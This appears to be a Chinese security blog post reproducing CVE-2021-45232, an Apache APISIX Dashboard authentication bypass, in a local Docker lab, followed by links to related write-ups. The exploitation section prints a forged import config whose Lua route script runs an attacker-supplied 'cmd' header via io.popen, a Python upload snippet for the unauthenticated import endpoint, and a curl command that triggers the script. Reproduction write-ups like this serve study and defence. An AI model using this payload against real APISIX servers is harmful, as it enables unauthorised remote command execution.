CVE-2021-45232漏洞复现

最新推荐文章于 2025-06-29 03:24:54 发布
原创 最新推荐文章于 2025-06-29 03:24:54 发布 · 8.1k 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文详细介绍了CVE-2021-45232,一个Apache APISIX Dashboard的身份验证绕过漏洞。通过环境搭建、漏洞验证和利用过程的演示,展示了如何利用该漏洞获取配置文件并执行系统命令。同时,文中还提及了在复现过程中遇到的两个问题及其解决办法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

1.漏洞介绍

编号: CVE-2021-45232
组件: APISIX
漏洞类型: 身份验证绕过
影响: 身份验证绕过
简述: 在2.10.1之前的Apache APISIX Dashboard中,Manager API使用了两个框架,并在框架‘gin’的基础上引入了框架‘droplet’,所有的API和认证中间件都是基于框架‘droplet’开发的,但有些API直接使用框架‘gin’的接口,从而绕过了认证。
版本影响 :
apache: 2.7.0 < APISIX Dashboard< 2.10.1	2.10.1

2.漏洞环境搭建

git clone https://github.com/apache/apisix-docker
cd ./apisix-docker/example

首先,修改该目录下配置项,如图version版本修改为2,apisix-dashboard版本修改为2.8在这里插入图片描述

# 下载并启动环境
docker-compose up -d

接下来进行一些简单配置,模拟实战环境

默认登陆地址:ip:9000
默认用户名密码:admin/admin

切换路由选项,选择创建
在这里插入图片描述
在这里插入图片描述

名字随便起,一会会用到
在这里插入图片描述
目标节点随意,直接下一步
在这里插入图片描述
一路下一步,直接提交即可
在这里插入图片描述
路由界面即可看到我们的配置
在这里插入图片描述

3.漏洞验证

# 直接访问即可
ip:port/apisix/admin/migrate/export

这里出现了配置文件泄漏
在这里插入图片描述
看一下,正是我们刚刚配置的路由,已经泄漏出来
在这里插入图片描述

4 漏洞利用

主要利用过程就是在接口路由中执行一个扩展脚本 , 通过他执行系统命令。
这里先手动测试一下。
在这里插入图片描述
注意这里的的配置文件是可以修改的,script直接加上就行
在这里插入图片描述
然后进行访问http://ip:9000/test。(test就是上面创建的路由名称)
进入容器查看:这里注意的是。最终脚本执行不是在9000端口的容器里,而是在管理的apache/apisix 的 9080端口的容器里如图
在这里插入图片描述
在这里插入图片描述

OK,接下来就是如何在创建一个含恶意脚本的路由配置
这里用到了dashboard导入配置
根据emport导出的配置伪造一个配置文件

eval_config = {
    "Consumers": [],
    "Routes": [
        {
            "id": str(random.randint(100000000000000000, 1000000000000000000)),
            "create_time": 1641259840,
            "update_time": 1641260783,
            "uri": "/evil",
            "name": "evil",
            "methods": ["GET", "POST", "PUT", "DELETE", "PATCH", "HEAD", "OPTIONS", "CONNECT", "TRACE"],
            "script":"local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)",
            "upstream":
            {
                "nodes":
                [{"host": "1.1.1.1", "port": 8080, "weight": 1}],
                "timeout": {"connect": 6, "send": 6, "read": 6},
                "type": "roundrobin",
                "scheme": "http",
                "pass_host": "pass",
                "keepalive_pool": {"idle_timeout": 60, "requests": 1000, "size": 320}
            },
            "status": 1
        }
    ],
    "Services": [],
    "SSLs": [],
    "Upstreams": [],
    "Scripts": [],
    "GlobalPlugins": [],
    "PluginConfigs": []
}


# POST传递数据:
# 注意需要添加CRC32校验位
    files = {"file": ("data", data + crc32, "text/data")}
    resp = requests.post(url + "/apisix/admin/migrate/import", files=files)

直接攻击:

curl http://ip:port/evil -H cmd:ls

如图攻击成功
在这里插入图片描述

5.遇到的问题

5.1 apisix-dashboard报错:The manager-api and apache apisix are mismatched.

似乎是dashboard2.7版本与最新版apache apisix不兼容导致的,把dashboard改为2.7以上版本就好了,在这里我改为了2.8版本

5.2 apisix-dashboard一直转圈

在这里插入图片描述

刷新即可,千万不要在哪傻傻的等,(っ °Д °;)っ
参考文章

复现与代码分析】Apache APISIX Dashboard API权限绕过导致RCE(CVE-2021-45232
weixin_45694388的博客
04-24 1521
API接口未授权访问一直以来都是令甲方安全人员头疼的问题,在《OWASP API Security Top 10 2019》里面,Broken Object Level Authorization(失效的对象级授权),包括未授权、越权访问等,就是排在第一位的安全问题:未授权漏洞的出现频率越来越高,且漏洞的利用又相对简单,今后应针对这个方向的漏洞多做积累,多做总结。
每日一漏洞cve-2021-45232
jjjj1029056414的博客
07-27 242
复现漏洞cve-2021-45232(Apache APISIX Dashboard API权限绕过导致RCE)
CVE-2021-45232 Apache APISIX Dashboard RCE漏洞复现
m0_58596609的博客
01-17 2867
CVE-2021-45232 Apache APISIX Dashboard RCE漏洞复现
[复现] CVE-2025-33053
最新发布
安全小白,希望我的文章对你有所帮助。
06-29 1223
本地复现CVE-2025-33053
漏洞复现CVE-2021-45232 Apache-apisix-dashboard
m0_53121608的博客
07-13 223
漏洞复现CVE-2021-45232 Apache-apisix-dashboard
CVE-2021-45232 Apache-apisix-dashboard RCE复现
weixin_46137328的博客
01-10 1966
0x00 概述Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache AP...
cve-2021-45232、Apache APISIX Dashboard身份认证绕过自检方法
weixin_48421613的博客
12-29 3657
漏洞描述 Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。 该漏洞的存在是由于 Manager API 中的错误。Manager API 在 gin 框架的基础上引入了 droplet 框架,所有的 API 和鉴权中间件都是基于 droplet 框架开发的。但是有些 API 直接使用了框架 gin 的
CVE-2021-25281:链接CVE-2021-25281和CVE-2021-25282以利用SaltStack
03-03
2021年,盐栈遭遇了两个严重的安全漏洞,分别是CVE-2021-25281和CVE-2021-25282。这两个漏洞允许攻击者在受影响的系统上执行任意代码,从而可能导致数据泄露、系统破坏或被用作进一步攻击的跳板。 **CVE-2021-...
检测通过“ proxylogon”组漏洞CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065)利用的Microsoft Exchange服务器上掉落的Web Shell-.NET开发
05-27
预认证SSRF,CVSS:3.0 9.1 / 8.4 CVE-2021-26857,不安全的反序列化导致特权升级到SYSTEM级别,CVSS:3.0 7.8 / 7.2 CVE-2021-26858,认证后文件写入, CVSS:3.0 7.8 / 7.2 CVE-2021-27065,认证后文件写入,CVSS...
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
CMS Made Simple (CMSMS) 前台代码执行漏洞 CVE-2021-26120.md
04-08
CMS Made Simple前台代码执行漏洞 CVE-2021-26120 漏洞背景 CMS Made Simple(CMSMS)是一个免费且开源的内容管理系统(CMS),面向开发人员、程序员和网站所有者提供网页开发和管理功能。CMSMS 使用 Smarty 模板...
Apache APISIX Dashboard 未授权访问(CVE-2021-45232 )
m0_54125423的博客
03-01 5318
一、漏洞原理 Apache APISIX是一个实时、动态、高性能的API网关。Apache APISIX Dashboard旨在让用户尽可能容易地通过前端界面来操作Apache APISIX。 2021年12月27日,Apache官方发布安全通告,Apache APISIX Dashboard中存在一个未授权访问漏洞CVE-2021-45232)。 在2.10.1之前的Apache APISIX Dashboard中,Manager API使用了两个框架,在框架 "gin "的基础上引入了框架 "d
Apache APISIX Dashboard 未授权访问漏洞CVE-2021-45232
Bird&Bird
03-13 1102
Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。该漏洞的存在是由于 Manager API 中的错误。Manager API 在 gin 框架的基础上引入了 droplet 框架,所有的 API 和鉴权中间件都是基于 droplet 框架开发的。但是有些 API 直接使用了框架 gin 的接口,从而绕
Apache APISIX Dashboard 未授权访问漏洞公告(CVE-2021-45232)
ApacheAPISIX的博客
12-29 2658
在 Apache APISIX Dashboard 2.7-2.10 版本中出现了未经授权访问的安全漏洞,现将处理信息进行相关公告。
Apache APISIX Dashboard 身份验证绕过漏洞CVE-2021-45232
Adminxe的博客
12-29 3296
0x00 漏洞描述 Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。 CVE-2021-45232漏洞的存在是由于 Manager API 中的错误。Manager API 在 gin 框架的基础上引入了 droplet 框架,所有的 API 和鉴权中间件都是基于 droplet 框架开发的..
CVE-2021-45232未授权接口练习笔记
2302_77611368的博客
03-25 343
是 Apache APISIX Dashboard 中的一个严重权限漏洞,类似于攻击者无需密码即可拿到整个网关系统的“万能钥匙”。攻击者利用此漏洞,可直接操控网关流量转发规则,甚至远程执行代码,引发服务器沦陷。
复现vulhub中Apache APISIX Dashboard API权限绕过导致RCE(CVE-2021-45232
YX_zjp的博客
05-09 768
Apache APISIX Dashboard 2.10.1版本前存在两个API`/apisix/admin/migrate/export`和`/apisix/admin/migrate/import`,他们没有经过`droplet`框架的权限验证,导致未授权的攻击者可以导出、导入当前网关的所有配置项,包括路由、服务、脚本等。Apache APISIX是一个动态、实时、高性能API网关,而Apache APISIX Dashboard是一个配套的前端面板。9080端口是Apache APISIX监听端口。
Apache APISIX Dashboard 身份验证绕过漏洞CVE-2021-45232
kukudeshuo的博客
12-30 2974
Apache APISIX Dashboard 身份验证绕过漏洞CVE-2021-45232漏洞描述 Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。 CVE编号 CVE-2021-45232 FOFA语句 title="Apache APISIX Dashboard" 影响范围 Apache
cve-2021-漏洞复现
01-02
### CVE-2021系列漏洞复现实例 #### CVE-2021-34429 Jetty WEB-INF文件读取漏洞复现 对于Jetty服务器中的CVE-2021-34429漏洞,该缺陷允许攻击者通过特定路径访问受保护的WEB-INF目录下的资源。为了验证此安全问题的存在,在实验环境中启动了受影响版本的服务,并利用浏览器尝试获取敏感配置文件。 当部署好存在漏洞的应用程序之后,可以通过如下URL请求查看是否存在未授权的信息泄露情况: ``` http://<target-ip>:8080/ ``` 其中`<target-ip>`应替换为目标机器的实际IP地址[^1]。 一旦成功连接到服务端口并正确构建查询字符串,则可能返回不应该公开的内容片段,证明了潜在的安全风险确实存在于当前设置之中。 停止测试环境的操作命令为`docker-compose down`以便清理所有关联容器及其网络结构。 ```bash docker-compose down ``` #### CVE-2021-31805 Struts2 OGNL注入漏洞(S2-062) 针对Struts框架里的CVE-2021-31805即S2-062事件,它涉及到了恶意OGNL表达式的执行能力,从而实现远程代码控制的目的。要重现这一现象,通常会构造特殊的HTTP参数提交给易受攻击的应用接口,这些参数包含了精心设计过的脚本逻辑用于突破默认防护机制。 例如,可以向应用程序发送带有特殊构造的数据包,触发后台解析过程中存在的弱点,进而达到任意指令下发的效果。具体操作方式依赖于目标平台的具体实现细节以及所使用的组件库版本号等因素影响下而有所不同[^2]。 #### WebLogic CVE-2021-2394 反序列化RCE漏洞 关于Oracle WebLogic Server内的CVE-2021-2394问题,这是一种基于Java对象流处理不当引发的远程命令执行隐患。由于其内部某些功能模块未能充分校验外部输入数据的有效性和安全性,使得经过特别编码后的二进制串能够在未经适当审查的情况下被加载运行,最终造成不受限权限滥用的可能性增加。 这种类型的攻击往往涉及到复杂的技术手段组合应用,比如结合其他已知漏洞形成更强大的穿透力;同时也要注意官方给出的各种修复建议和补丁更新信息,及时采取措施防止此类威胁扩散蔓延开来[^3]。
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值